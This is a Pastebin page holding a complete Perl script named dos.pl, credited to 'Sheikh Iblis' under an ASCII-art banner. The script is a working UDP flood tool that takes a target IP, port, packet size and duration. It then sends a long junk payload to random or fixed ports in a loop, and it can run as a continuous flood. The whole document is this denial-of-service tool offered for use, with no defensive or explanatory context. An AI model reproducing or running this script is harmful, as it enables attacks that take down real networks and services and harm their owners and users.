Advertisement
iViiRuS

dos.pl

Mar 26th, 2015
1,287
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 2.48 KB | None | 0 0
  1. #!/usr/bin/perl START SCRIPT
  2.  
  3.  
  4. use Socket;
  5. use strict;
  6.  
  7. print '
  8.  
  9. +-------------------------------------------+
  10. |              
  11.   |$$$$$$         $$$$$        /$$$$$$|    |
  12. |              
  13.   |$$    $$|   |$$     $$|    |$$|         |
  14. |              
  15.   |$$    $$|   |$$     $$|     \$$$$$\     |
  16. |              
  17.   |$$    $$|   |$$     $$|         |$$|    |
  18. |              
  19.   |$$$$$$        $$$$$       |$$$$$$/      |
  20. +-------------------------------------------+
  21.                                            
  22.           By, Sheikh Iblis
  23.  
  24. ';
  25. print "\n";
  26.  
  27.  
  28. if ($#ARGV != 3) {
  29.   print "dos.pl <ip> <port> <size> <time>\n\n";
  30.   print " port=0: use random ports\n";
  31.   print " size=0: use random size between 64 and 1024\n";
  32.   print " time=0: continuous flood\n";
  33.   exit(1);
  34. }
  35.  
  36. my ($ip,$port,$size,$time) = @ARGV;
  37.  
  38. my ($iaddr,$endtime,$psize,$pport);
  39.  
  40. $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
  41. $endtime = time() + ($time ? $time : 1000000);
  42.  
  43. socket(flood, PF_INET, SOCK_DGRAM, 17);
  44.  
  45.  
  46. print "Flooding $ip " . ($port ? $port : "random") . " port with " .
  47.   ($size ? "$size-byte" : "random size") . " packets" .
  48.   ($time ? " for $time seconds" : "") . "\n";
  49. print "Break with Ctrl-C\n" unless $time;
  50.  
  51. for (;time() <= $endtime;) {
  52.   $psize = $size ? $size : int(rand(1024-64)+64) ;
  53.   $pport = $port ? $port : int(rand(65500))+1;
  54.  
  55.   send(flood, pack("a$psize","saf3e368wumu7repa4uxa2rucHaphubeGamu9R3373af8Us3eTHUgepRAfAS2c6CHAyegURepUbre94wRAwruS2uhU8UXasp7spasw7sw8h7wapr5spabekumu8ast8StRadusASacu6a6e5efrAzeWucH5cumuswaraca7hAbrewrecujetrafefadrawruW4ayAjU37sPUseBr4cRuPhacrUtrf0azrrQlLd1xdSjjtdwXfjyXArkExrVxVlulxssmr0u0lRscLAqjkZB43ajPRmAH4JQ6T1SOZPFmndbEi4IUOIuUmPCXI044f73uGIeJHs8lh36KpJausXqykL2idPx1j120Rra2DI1kmGgde5LI4TJMuQvrotBR3Fli0g1uwt74ALKfRzHYZJR0wkqNncUY178LcbTFtx5n7MF4zX3P4Z3mUVkAebkXqDv6EETKTNBes9kW2QBEBLeKcBH4cUAQ8Y30mdGozVRNJq3wtDMmgtzCibqXEEp3cZATTOMqIDxn3t5HYdspEofPneXpPTUE0TBN8oRAp4DjSlhfDAVmfNgbdSbTHWT7Y7gVi6kgrNXKCM64V4kOGvesVr0SZU3k83r6qAr3w4d26kurU9eBRa53cEtRaQaCHEvacu4PETRaf3yepHAk9FAgU2at8GEMEZAwUjaDesTufu2r3DaPhedR7quCru7reketc8atacAStuGeFruNuTHaWuspabr6drARa4r4cApRewuFRaD3qAXAsPeMAChudRUWxuq73R5dra8epre4tasp8craq677wru5asuq3tradede8rethuSwAfespastuduypUt2fudra5utanewrat83rucruyuje6aphuprUWawrawr4tha922HeSpU8acacu5hastuprecevasteberepagas6ejuje2heswugukerebrajeVeswerajAdagecah3phE9EsutaFrU6erathu2u6utraseCrEjehaChuphEchepeswutrezu86pret6afa"), 0, pack_sockaddr_in($pport, $iaddr));}
  56.  
  57. #!/usr/bin/perl END SCRIPT
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement